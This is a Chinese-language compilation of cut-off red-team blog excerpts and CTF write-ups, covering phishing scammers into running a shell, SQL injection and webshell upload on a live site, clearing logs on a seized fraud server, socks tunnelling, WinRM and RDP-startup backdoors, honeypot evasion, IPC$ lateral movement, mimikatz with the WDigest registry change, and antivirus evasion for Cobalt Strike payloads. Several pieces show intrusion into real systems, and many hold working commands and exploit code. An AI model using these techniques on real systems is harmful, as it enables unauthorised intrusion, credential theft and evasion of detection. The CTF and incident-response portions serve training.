红队攻击面相关讨论

一、插件介绍Turbo Intruder 是一个 Burp Suite 扩展插件，用于发送大量 HTTP 请求并分析结果，可拥抱十亿请求攻击。它旨在处理那些需要异常速度、持续时间或复杂性的攻击来补充Burp Intruder。二、插件原理使用第一次请求的时候就建立好连接，后续获取资源都是通过这条连接来获取资源的长连接，它还使用了HTTP 管道(HTTP Pipelining )的方式来发送 请求，这种方式会在等待上一个请求响应的同时，发送下一个请求。而在发送过程中不需要等待服务器对前一个请求的响应；只不过，客户端还是要按照发送请求的顺序来接收响应。通过 HTTP 管道的方式发起请求是短连接(Connection: close )速度的 6000% 三、安装方式Burp Suite的BApp Store安装Turbo intuder插件 四、使用方式 选中数据包右键选择Send to turbo intruder（这里一定要抓取数据包，没有抓取是不会显示send to tubo intruder菜单） 此时会打开一个新的窗口，该窗口上半部分区域为原始的HTTP请求包，下半部分为操作代码，中间部分可以根据场景从下拉框中选择具体操作代码。每次打开时此处默认为Last code used，即为上次使用的代码。 其中代码区需要使用“%s”字符来代替需要进行Fuzz的部分。选择对应的操作代码点击最下方Attack即可开始攻击。具体使用细节，可结合第三部分使用场景。 五、使用场景1.验证码爆破主要出现在手机验证或者邮箱验证码登录以…

01 前言 近日无事闲逛，偶遇某群有人在招程序员帮忙写Exp和收shell啊收0day啊，又觉近日无文章可写，所以便尝试社会一波大佬。 首先呢先问问套路一下，看看他干啥的. 这个人想找人帮忙写批量的Exp 然后假装自己能写，先套路一波，进入角色，让对方以为我真的可以写。 这里呢，我说我自己搭建了一个站点，用于测试，然后叫他链接shell试试看看。是否OK！ 接着该目标并未上线，他将我搭建的站点发送给了他们手下的其他两个人。 02 技术一号 被我社工的这个某产人员，实际不懂技术，他将我的钓鱼页面发给了他们手下2个技术人员，其中一个上线的估计是个虚拟机，另外一个上线的则是物理机。所以这里只钓鱼到了一台。 这里一共上线了2台PC电脑，他们拥有统一的外网IP出口，柬埔寨显示地点，目前不知道真假。这个人就是我们所谓的脚本小子黑客。给各位看看他的PC都有那些资料。 脚本木马 各类实名证件 各种批量黑客工具 黑帽SEO关键词 入侵用的各类VPS机器 各类网站的账户 03 内网拓展渗透 每一个进程都有一个环境块，其中包含一组环境变量及其值。有两种类型的环境变量，用户环境变量和系统环境变量。 arp -a 看了一下。发现了如下机器。10多台。 192.168.1.1 78-44-fd-fd-55-b9 动态 192.168.1.13 6c-8d-c1-18-aa-b2 动态 192.…

0x01 前言 在一次攻防演练信息收集过程中，发现该网站和给的资产网站是同一IP段于是有了此次违法站点的渗透。 末尾可领取字典等资源文件 0x02 SQL漏洞发现 到站点进行访问 利用插件查看站点为php 常规扫目录 前台 一键登录之后在新增地址处发现存在注入 0x03 进一步漏洞利用 此处提示需要get传参，在address.php请求处，随便填了个数字请求后，继续填写信息并抓包跑sqlmap 经过长时间的等待，发现存在布尔盲注和报错注入 接下来找站点后台管理地址 利用注入得到的账号密码登入后台 0x04 任意文件上传 寻找上传点 上传 访问路径 直接上传php抬走 至此拿下了这个站点，简单高效 一套带走！

这是一则漫长又跌宕起伏的故事，小伙伴们请随意就坐，自备茶点；全文包含信息收集与攻克的详细全过程，以及对该类型诈骗思路的分析拆解，以提高防范意识； 0x00 梦的开始那是一个阳光明媚的晌午，日常的搬砖过程中收到一封公司邮件， 看到这熟悉的措辞，又瞄了一眼下面的附件内容，熟悉的气息扑面而来，就顺手保存了下来； 随即管理员立马发现了不对劲，追发邮件说员工账号被盗用，不要轻信邮件内容，原始邮件也被标为垃圾邮件（上次的类似邮件删的太突然，事情还没开始就结束了，这次总跑不掉了(￣_,￣ )，作为当代好青年，五星好市民，是时候发扬一下活雷锋精神了）； 而这张图片，就成了一切梦开始的地方…… 0x01 信息收集0x001 审查域名起始信息非常有限，开局一张图，剧情全靠猜，不过这个入口也足够了，先拿出家伙解析下二维码中的信息： 没有额外的数据，只有一串网页链接，看着这域名名称，嘴角微微上扬；先去解析一下域名： 到写文为止已经不能解析该域名了，整顿的倒挺快，不过好在之前有解析备份，域名万变不离其 IP，并且也没有发现使用 CDN，流量全部通往源站；顺手查了一下，是香港的服务器： 然后 whois 一下，搜集相关信息： 不出意外，又是用的三方注册机构，没有额外的有用信息，不过这个注册时间挺有意思，本月的，骗子同志动作还蛮快的；接下来只能去对方网站瞅瞅； 又是西部数码，看来有些备受青睐，网站提供隐私保护机制，注册信息不对外公开，暂时也获取不到有用信息； 0x002 审查 IP现在唯一的线索就是之前解析的那个 IP 了，一步一步来，先 …

前情提要上回故事说到，骗子服务器的最高权限虽然已经拿到，但这也只是技术层面的掌控，想要立案，需要提供尽量多的人员相关信息，如手机、银行卡等，但这些目前都并未采集到（前面虽然提到了某次源码有个银行账户，但后面发现那只是个测试号，百度出来一堆在用的…），所以还需要通过一些额外的手段去获取有用的信息； 信息收集宝塔后台首先想到的就是之前一直留着没进去的宝塔面板后台，里面应该会有些登录信息之类，但并没有得到登录密码，但这也并没有太大影响，因为现在可以直接访问宝塔的数据库文件（panel/data/default.db， sqlite数据库文件），所以直接进去备份个账户然后设置个密码，防止把正常账户挤下去： 清理下日志，然后就是愉快的登录进去 ㄟ( ▔, ▔ )ㄏ： 首先看到的就是账户名，想是管理员的手机号，这里看不全，去设置里面瞅瞅： 这里也是中间四位打了星号，从源码里也看不出，但这些也都是纸老虎，因为随后审查发现一处接口请求数据，返回信息里是完整的手机号，微信搜了下也有这个这么个账户： 但其真实性未知，多半只是个幌子，先记着吧； 新起点在之后某个时间点准备继续收集信息的时候，发现其域名甚至IP都无法再访问了，后面几天试了也都不行，感觉可能是收割完一波然受卷款跑路了；自然，除了一些信息，之前获取的所有权限，都化作泡影了；也是在这之后，警察蜀黍竟主动联系了过来（没有喝茶，俺是良民 $_$），由于想着再碰碰运气看看，结果有趣的事再次发生了，访问之前那个IP展示出了这么个页面： 好吧得承认，那一瞬间确实差点信了这标题和图标，还浪…

前言在内网渗透时，一个WebShell或CobaltStrike、Metasploit上线等，只是开端，更多是要内网横向移动，扩大战果，打到核心区域。但后渗透的前提是需要搭建一条通向内网的“专属通道”，才能进一步攻击。可实战中因为网络环境不同，所利用的方式就不同。 以下为自我总结“实战中内网穿透的打法”思维导图： 目标出网（socks代理）这是实战中最愿意碰到的网络环境，目标机可以正常访问互联网，可直接在目标机挂socks代理或CobaltStrike上线，打通目标的内网通道。 Frp（socks5） Frp服务端配置文件： 1 | [common] 2 | bind_port = 8080Frp客户端配置文件： 1 | [common] 2 | server_addr = xx.xx.xx.xx 3 | server_port = 8080 4 | #服务端口使用Web常见端口 5 | 6 | [socks5] 7 | type = tcp 8 | remote_port = 8088 9 | plugin = socks5 10 | use_encryption = true 11 | use_compression = true 12 | #socks5口令 13 | #plugin_user = SuperMan 14 | #plugin_passwd = XpO2McWe6nj3此处添加了加密压缩这两个功能，默认是不开启的，根据作者介绍，压缩算法使用的是 snappy。 use_encryption = true 启用加密…

WinRM实现端口复用这种攻击方式前提是需要帐号和密码，如果在获得hash的情况下也可以利用evil-winrm来实现hash登录 服务介绍WinRM全称是Windows Remote Management，是微软服务器硬件管理功能的一部分，能够对本地或远程的服务器进行管理。WinRM服务能够让管理员远程登录Windows操作系统，获得一个类似Telnet的交互式命令行shell，而底层通讯协议使用的是HTTP。 后门应用在windows2012服务器中，winrm默认启动，开启了5985端口，在2008系统中需要手动开启服务 winrm quickconfig -q启动后防火墙也会放行该端口 设置启用httplistener监听并存 winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} //80 winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"} //443 修改监听端口为80/443 winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"} winrm set winrm/config/Listener?Address=*+Transport=HTTPS　 @{Port="443"} 本地连接也需要开启WinRM服务，然后设置信任连接的主机， winrm quickc…

近期因为都懂的原因做了回蓝队，还偶尔客串了下和客户对接的角色，根据接触到的各家设备的特点写了一些总结。从红队的视觉下看如何防止被溯源。 ---8sec.cc 1、蜜罐系统浏览器使用注意单独隔离的浏览器 在渗透过程中尽量使用与常用浏览器不同的浏览器，如：Chrome常用，渗透使用firefox。 使用无痕模式 firefox和Chrome都有无痕模式，如果对目标资产不了解的情况下尽量开启无痕模式进行测试。 以上两种方式主要可以避免蜜罐中使用各大网站的Jsonp Callback、XSS等漏洞获取到红队人员的ID和信息。 但是蜜罐中使用的fingerprintjs库可以根据不同IP和不同浏览器的特定标识来判断来源访客是否是同一个人员，所以单独使用无痕模式和不同的浏览器也会导致被蜜罐识别。 反蜜罐插件bypass HoneypotAntiHoneypot - 一个拦截蜜罐XSSI的Chrome扩展 功能截获页面中发起的XSSI请求，通过特征识别阻断可疑的XSSI（Jsonp Callback、XSS等）分析和攫取蜜罐固有特征，识别蜜罐并拦截所有请求判断fingerprintjs库是否存在并提示，判断是否有其他web指纹的相关调用判断是否有持久化身份标识的相关调用判断页面中是否对剪贴板的粘贴进行了取值（待进一步验证）一键清除当前网站的所有浏览器数据功能（包括所有缓存的、存储的）判断页面中是否操作了FileSystem（可以把evercookie写到这里）2、防止反制服务器跳板机 根据各家溯源获取信息量排除蜜罐因素也有一部分的原因是VPS被打…

近期在项目中管理员在rdp挂载之后搞掉了管理员，想着有时间就整理下针对rdp的利用方法。 针对挂盘的利用方法复制文件这个不多说，可以根据的不同的挂盘来决定是拖文件还是放启动项。有一些自动文件监控和拷贝的应用,如：https://github.com/cnucky/DarkGuardianDarkGuardian是一款用于监控RDP登录后TSCLIENT(挂盘)的工具,工具后台运行时可自动获取挂盘的文件列表,下载指定文件,拷贝木马文件到挂载硬盘的启动项等功能 RDPInception这种方法相对鸡肋一点，原理就是利用bat脚本放到server启动项/winlogon执行脚本处，等待管理员挂盘后重启执行命令。 @echo off echo Updating Windows ... @echo off timeout 1 >nul 2>&1 mkdir \\tsclient\c\temp >nul 2>&1 mkdir C:\temp >nul 2>&1 copy run.bat C:\temp >nul 2>&1 copy run.bat \\tsclient\c\temp >nul 2>&1 del /q %TEMP%\temp_00.txt >nul 2>&1 set dirs=dir /a:d /b /s C:\users\*Startup* set dirs2=dir /a:d /b /s \\tscl…

1.pyc 使用pyc在线反编译得到python源码： #!/usr/bin/env python # visit https://tool.lu/pyc/ for more information # Version: Python 3.8 import random def encrypt_file(file_path): random.seed(114514) # WARNING: Decompyle incomplete file_path = "./flag" encrypt_file(file_path) 然后使用AI分析可得到它对应的解密脚本 import random import os def decrypt_data(encrypted_data): random.seed(114514) decrypted_data = bytearray() for byte in encrypted_data: key = random.randint(0, 128) decrypted_data.append(byte ^ key) return decrypted_data def read_file(file_path, mode='rb'): with open(file_path, mode) as file: return file.re…

WEB ezphp 题目描述：一支专注于卫星通信技术的研究团队正在努力改进他们的通信系统，以提高数据传输的效率和安全性，团队决定采用PHP 8.3.2来完善通信系统开发。 考点：php filter chain Oracle PHP Filter链——基于oracle的文件读取攻击 参考：https://xz.aliyun.com/t/12939?time__1311=mqmhqIx%2BxfOD7DloaGkWepSazHG%3D4D#toc-16 题目给出源码如下 <?php highlight_file(__FILE__); // flag.php if (isset($_POST['f'])) { echo hash_file('md5', $_POST['f']); } ?> 这里可以用的项目：https://github.com/synacktiv/php_filter_chains_oracle_exploit/ 考点：可用PHP Filter链-基于oracle的文件读取攻击生成exp执行，题目提示php版本号正好满足条件，下载exp进行利用 执行payload，这里可能需要多跑几次才可以 python3 filters_chain_oracle_exploit.py --target http://eci-2zea1zzp9231ugqw9htd.cloudeci1.ichunqiu.com/ --file flag.php --parameter f …

在正常情况中，横向移动是在已经获取了足够的权限的情况下进行横向移动，下面中的方法大部分也需要高权限的操作。 https://www.freebuf.com/articles/network/251364.html 内网横向移动分为三种情况： 1.在VPN环境中进行横向移动； 2.在socks代理环境中进行横向移动； 3.在远程木马的环境中进行横向移动； 文件传输-前期准备在进行横向移动的过程中，我们首先应该考虑的是文件传输方案，对之后向攻击目标部署攻击载荷或其他文件提供便利。 网络共享在windows系统中，网络共享功能可以实现局域网之间的文件共享。提供有效的用户凭据，就可以将文件从一台机器传输到另一台机器。 获取到windows中系统默认开启的网络共享。 net share 在实战中，往往会使用IPC$连接，而IPC$连接需要两个要求。 1.远程主机开启了IPC连接； 2.远程主机的139端口和445端口开放； net use \\10.10.10.10\IPC$ "admin!@#456" /user:"administrator" 此时，如果你具备足够权限的凭据，即可使用dir或者copy命令查看目标主机的信息。 安全性考虑：这些指令是在本地执行，远程的命令，因此不会在远程连接的主机留下日志信息，因此是比较安全。 搭建SMB服务器https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87%E5%91%BD%E4%BB%A4%E…

一、WEB1.消失的flag访问提示Access Denied fakeip插件伪造ip 提示File is Null 尝试加file参数 ?file=index.php`提示`do not hack!! 大概是filter-chain 参考文章： https://www.cnblogs.com/linuxsec/articles/12684259.html https://blog.csdn.net/yuanxu8877/article/details/127607264 php://filter/convert.iconv可以成功 /?file=php://filter/convert.iconv.utf-8.utf-16/resource=index.php /?file=php://filter/convert.iconv.utf-8.utf-16/resource=/flag2.unserialize_web先看看有没有常见的备份文件或者robots.txt、www.zip、.git、.svn、.www.tar.gz这些 能发现有一个备份文件，www.tar.gz 那么访问 URL/www.tar.gz把备份文件下载下来 看见源码都在这里了，主要就是看upload.php和download.php 然后在CSDN能看到类似的题目，为： https://blog.csdn.net/m0_70819573/article/details/129506508 https://blog.csdn.net/2301_7970…

WEBSQLUP打开题目给了一个登录页面结合名字猜测为SQL注入 查看源码发现有hint提示开发者使用的是模式匹配 所以我尝试使用%来模糊匹配，登陆成功 进入面板之后发现有一个文件上传功能 尝试上传php文件，结果被waf，文件名字不能出现p 我想到了使用.htaccess文件来解析gif文件来getshell 先上传.htaccess文件, 将1.gif当作php解析 接着上传1.gif文件 之后访问uploads/1.gif即可getshell，但是还需要提权读取flag 寻找提权命令 发现tac命令可以使用 CandyShop源码如下 import datetime from flask import Flask, render_template, render_template_string, request, redirect, url_for, session, make_response from wtforms import StringField, PasswordField, SubmitField from wtforms.validators import DataRequired, Length from flask_wtf import FlaskForm import re app = Flask(__name__) app.config['SECRET_KEY'] = 'xxxxxxx' class RegistrationForm(FlaskForm): …

检材链接：https://pan.baidu.com/s/1fwHb_5svMyK3Gr4-QeNc0Q?pwd=43a3 挂载密码：2024Fic@杭州Powered~by~HL! 手机部分1. 嫌疑人李某的手机型号是？ A. Xiaomi MI 2s B. Xiaomi MI 4 C. Xiaomi MI 6 D. Xiaomi MI 8 在火眼中分析到蓝牙名称是Xiaomi MI3W 但是选项中没有，因此我们可以通过useragent.txt去查看手机型号 2. 嫌疑人李某是否可能有平板电脑设备，如有该设备型号是？ A. iPad Pro 11 B. Vivo Pad 2 C. MatePad Pro D. Xiaomi Pad 6s wifi连接记录 3. 嫌疑人李某手机开启热点设置的密码是? 火眼秒了 5aada11bc1b5 4. 嫌疑人李某的微信内部ID是？ wxid_wnigmud8aj6j12 5. 嫌疑人李某发送给技术人员的网站源码下载地址是什么 新佛曰：諸隸僧殿降吽諸陀摩隸殿僧殿缽殿薩願僧殿宣摩殿嚴願殿是迦咒叻吶嚤須塞亦須阿隸嚤須愍眾殿蜜殿隸願蜜哆蜜亦願是念慧殿隸摩哆殿即隸嚤訶須隸亦愍如如殿囑殿囑 新佛曰秒了（http://hi.pcmoe.net/buddha.html） http://www.honglian7001.com/down 6. 受害者微信用户ID是？ 看聊天记录 wxid_u6umc696cms422 7. 嫌疑人李某第一次连接WIFI的时间是？ A. 03-14 15:55:57 B. 03-14…

第一章 应急响应-webshell查杀 简介 靶机账号密码 root xjwebshell 1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx} 2.黑客使用的什么工具的shell github地址的md5 flag{md5} 3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx 4.黑客免杀马完整路径 md5 flag{md5} 1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx} 进去靶机开久了会扣金币，所以一进去把文件dump下来 tar -czvf html.tar.gz ./ dump下来之后直接先D盾一把梭先 扫描结果如下 id 级别 大小 CRC 修改时间 文件 (说明) -------------------------------------------------------------------------------------------------------------------------------------------- 00001 4 38 FEE1C229 23-08-02 10:52:25 \html\shell.php 『Eval后门 {参数:$_REQUEST[1]}』 00002 4 …

CryptoXOR1.打开环境是一串字符，用一个异或脚本或者在线解码工具就可以解出来(只有一次加密) key是mimic 解密得到flag 在线解密 或者脚本： Pwnezcode套json的直接shellcode，限制长度0x16，先实现0x16字节内的mprotect+read，后续写orw_shellcode from pwn import * import json context(log_level='debug',os='linux',arch='amd64') pwnfile = './vuln' io=process(pwnfile) #io = remote() elf = ELF(pwnfile) libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #libc = ELF("./libc.so.6") shellcode=''' sal edi,12 mov dx,7 mov ax,10 syscall cdq xor eax,eax mov esi,ecx xor edi,edi syscall ''' shellcode1 = asm(shellcode) print("len-->",len(shellcode1)) payload1 = { "shellcode": shellcode1.hex() } io.sendlineafter("Please enter your input:",json.dumps(payload1))…

decompress压缩包套娃，一直解到最后一层，将文件提取出来 提示给出了一个正则，按照正则爆破密码，一共五位，第四位是数字 ^([a-z]){3}\d[a-z]$一共就五位数，直接ARCHPR爆破，得到密码 xtr4m，解压得到flag pleasingMusic题目描述中提到： 一首歌可以好听到正反都好听 根据提示（其实也能听出来后半段音乐是倒放出来的）将音频进行反向处理实现倒放，再解析其中的摩斯电码（Morse Code）。 可以手动翻译摩斯电码表，也可以使用在线解码。 粗的表示：-，细的表示：.间隔或者空格：用空格或者/分割 WhereIsFlag纯命令手工查找，找到真正的 flag 在 /proc/self/environ 文件（可用于获取当前进程的环境变量）内，只要执行下面的命令就能拿到 flag. cat /proc/self/environ Labyirinth 兑换码 wireshark_checkin wireshark_secret 联系题目描述，找到提瓦特文字对照表 对照表解出了很多东西 我一开始一直试的中间的那串大的，但是大小写都不对 后面继续解密四周小的密文，得到：FLAGISASENTENCE IIAAELGTSFKFA DOYOUKNOWFENCE MESIOAABGNHNSGOGMYEIADE 提示 flag 是一句话，还有 FENCE 也就是栅栏加密MESIOAABGNHNSGOGMYEIADE https://ctf.bugku.com/tool/ra…

一、青龙组WEB web1 开局随便随便输入都可以登录，登上去以后生成了一个token和一个session，一个是jwt一个是flask框架的 这边先伪造jwt,是国外的原题 CTFtime.org / DownUnderCTF 2021 （线上） / JWT / Writeup 先生成两个token，然后利用rsa_sign2n工具来生成公钥 python3 jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYWFhIn0.EnToBP4kzW6jbUqkC7fjt-FcCq9mOMhKWRqKpo12BsG464YTX2QNiBLuzgqJhnDlGF2Ukqb6oWXhFm0qiKrbg1skUb0FO2kMBkEvRLpyGJ7tXOzcndGDl-egaMa-mSN321RNW-aiCKJsij5Tf0HzQgBU8UCg1Zd8uJaybcj3oXOi eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEifQ.IUanU3g_ZtyPjDnOJ9gockfRo1oOQLmQT0To_WYLi9I9PluHxbBId5d2wFiF-sIhGPuDtzPvShiE1ao0qnMlp3X7pVf-Qb-juaslvbnpR1rCKH2D3Kq4u1d2wEDvsgWVtjYA6s5NXrvJpzDcpZlzmx_6Ywn8caqVQ3kjlTv87OKO 得到public k…

域内日志一般以.evtx结尾，因此我们需要搜索域内日志可以使用dir指令 dir/s/b *.evtx /s：表示递归搜索，包括子目录。 /b：表示以简洁模式显示结果，只显示文件路径而不包括其他信息。 这里我们可以直接使用logparser工具导出域内的日志信息。（在域控主机中） logparser工具采用的是SQL查询的方式进行过滤。 使用下面的指令可以通过strings列和eventid列过滤出域内用户的登录行为。 LogParser.exe -i:evt -o:csv "SELECT RecordNumber,TimeWritten,EventID,Strings,Message into C:\log5.csv FROM Security where EventID='4624' and Strings LIKE '%|Kerberos|%|%.%.%.%|%' and Strings not LIKE '%|%$|%'" -i:输入文件类型 -o:输出文件类型 在正常的域渗透过程中，我们直接拿到域控，并且在域控的主机上进行操作导出日志一般的不现实的，一般采用下面的三种方式导出域控的日志或者是指定成员主机的日志进行分析： 1.VPN的方式； 2.通过搭建socks隧道的方式； 3.通过远程木马的方式； 通过VPN的方式查询日志一般来说，通过VPN连接目标主机，进入内网环境进行操作。 这里我们假定已经获得域管理的账号，通过域管理凭据进行导出日志分析。 1.查询主机的登录记录首先获得域控的日志存储位置 dir /s/b \\10.10…

这次的目标是个购物站点，希望发现更多的漏洞，最好是能拿到shell。 一些常见的漏洞都存在，比如任意修改他人密码、修改商品金额等逻辑漏洞都是存在的。但这里就不提这些逻辑漏洞了，这里说一说ssrf。 注册会员后，前台很多上传点，但是均无法上传shell。 通过nmap扫描端口发现对外开放了3306端口，也就是mysql数据库端口。 然后在一处下载文件的地方，看到了个可疑的url。 通过dnslog测试，发现是个ssrf漏洞。 尝试访问百度，得到出是完全回显的ssrf漏洞。 尝试这个ssrf是否支持其他协议，发现支持file协议，完全回显，又可以读文件，真舒服。 那么现在只需要让网站报错 爆出绝对路径，或者尝试去读取一些配置文件看看能否找到网站的绝对路径，最终读取到网站数据库的配置文件，那么就可以连接上数据库就可以拿到管理员账号密码了。 读取到 /etc/httpd/conf/httpd.conf 这个文件，发现网站路径为 /var/www/html 。 于是准备尝试去读取index.php发现居然没有内容，最后各种测试，各种组合，都没任何关于网站的回显，自闭了。 没办法，那就只有想办法让网站报错，看看路径对不对。 终于找到了个点让网站报错，发现之前的路径不对。 最终经过翻代码，找到了数据库配置文件，成功的找到了数据库账号密码。 成功连上了数据库。 最终成功进了后台。 后台还有个这个功能…… 嗯…… 非常好 over…… Uploading Attachment...

在内网渗透中，当攻击者获取到内网某台机器的控制权后，会以被攻陷的主机为跳板，通过收集域内凭证等各种方法，访问域内其他机器，进一步扩大资产范围。通过此类手段，攻击者最终可能获得域控制器的访问权限，甚至完全控制基于Windows操作系统的整个内网环境，控制域环境下的全部机器。 横向移动中的文件传输通过文件共享-IPC执行net share命令，可以获得Windows默认开启的网络共享，其中C$为C盘共享，ADMIN$为系统目录共享，还有一个IPC$共享。 IPC（Internet Process Connection）是共享”命令管道”的资源，为了让进程间通信而开放的命令管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。 实战中往往会建立IPC$连接，因为通过IPC$连接，不仅可以进行所有文件共享操作，还可以实现其他远程管理操作，如列出远程主机进程、在远程主机上创建计划任务或服务等。 建立IPC$连接需要具备以下两个条件： ①远程主机开启了IPC连接 ②远程主机的139端口和445端口开放 # IPC$ 连接 net use \\192.168.1.131\ipc$ # 建立空连接 net use \\192.168.1.131\ipc$ "password" /user:"Administrator" # 建立非空连接 # IPC$ 使用 net use # 查看本…

将对应 gcc.exe 和 go.exe 的路径替换成你自己的，然后重启主程序就可以使用了。 从20231208版本以后，你可以自己选择c编译器：tdm-gcc或者tcc。tcc生成的体积更小（实测7kb，使用upx可以压到5kb以内），但是不支持自定义程序图标。 生成路径中不要包含中文和空格，否则会生成失败！ 针对Cobalt Strike，不要选择生成Windows分阶段木马、Windows无阶段木马，而是生成payload，最终是一个payload.c文件。 下载之后本地打开：（记得关闭杀软） 2. 环境配置 安装环境：Windows10虚拟机 在这里新版本掩日采用了gcc环境和go环境，在作者的项目介绍中，对其都有要求，我们按照要求分别安装gcc和go的环境： gcc安装 gcc --version go安装 go version 3. 环境 在作者的介绍中，针对Cobalt Strike生成的木马要求： 针对Cobalt Strike，不要选择生成Windows分阶段木马、Windows无阶段木马，而是生成payload，最终是一个payload.c文件。 因此在这里我们使用最常用的CS的木马来进行操作。 3.1 环境准备 在本地启动一个CS，服务端： sudo ./teamserver 10.30.1.147 123 启用客户端，并新增监听，在这里使用作者建议的HTTPS方式： 然后生成一个payload.c文件： 3.2 测试环境 测试机： Windows10 360主动防御 Windows7 火绒主动防御 W…

获取当前机器的明文密码在导出域hash之前，我们可以先尝试导出当前机器的本地的hash密码，如果域用户之前在这台机器上进行登陆操作的话，可以直接获取到域用户甚至域管理员的账号。 在Windows操作系统上，sam数据库（C:\Windows\System32\config\sam）里保存着本地用户的hash。 在本地认证的流程中，作为本地安全权限服务进程lsass.exe也会把用户密码缓存在内存中（dmp文件）。 因此，在这里我们可以考虑两种方式进行抓取当前机器的hash：在线工具提取，离线分析提取。 注意：在windows 10\ 2012r2之后的系统版本中，默认情况下已禁用在内存缓存中存系统用户明文密码，此时再直接使用mimikatz去抓明文，肯定是抓不到的。密码字段位会直接显示为null。 这里我们手动修改注册表让其保存明文，方便我们进行抓取。（修改后需要注销用户再登陆） reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG\_DWORD /d 1 /f mimikatzmimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具，本意是用来个人测试，但由于其功能强大，能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试，可以说是渗透必备工具。 下载地址：https://github.com/gentilkiwi/mimikatz 1.通…

在进行渗透过程中，Exchange邮件服务器通常是我们重点关注的对象，因为拿下了Exchange邮件服务器，凭借其机器账户的权限，我们可以赋予其他域内用户dcsync的权限，进而导出域内hash，拿下整个域。 exchange系统的中配置powershell使用命令 https://learn.microsoft.com/zh-cn/powershell/module/exchange/add-mailboxfolderpermission?view=exchange-ps 扫描服务setspn.exesetspn.exe -T vvvv1.com -F -Q */* | findstr exchange nmapnmap 192.168.52.139 -A 探测版本与漏洞通过ews接口获得exchange精确版本信息 缺点：部分旧的exchange版本不支持该操作。 通过owa接口获取exchange粗略版本信息 获得版本号后，可以去官网查询对应的Exchange版本和发布日期。 查询地址： https://learn.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2016 使用脚本检测版本与漏洞 https://github.com/3gstudent/Homework-of-Python/blob/master/Exchange_GetVersion_MatchVul.py 爆破pytho…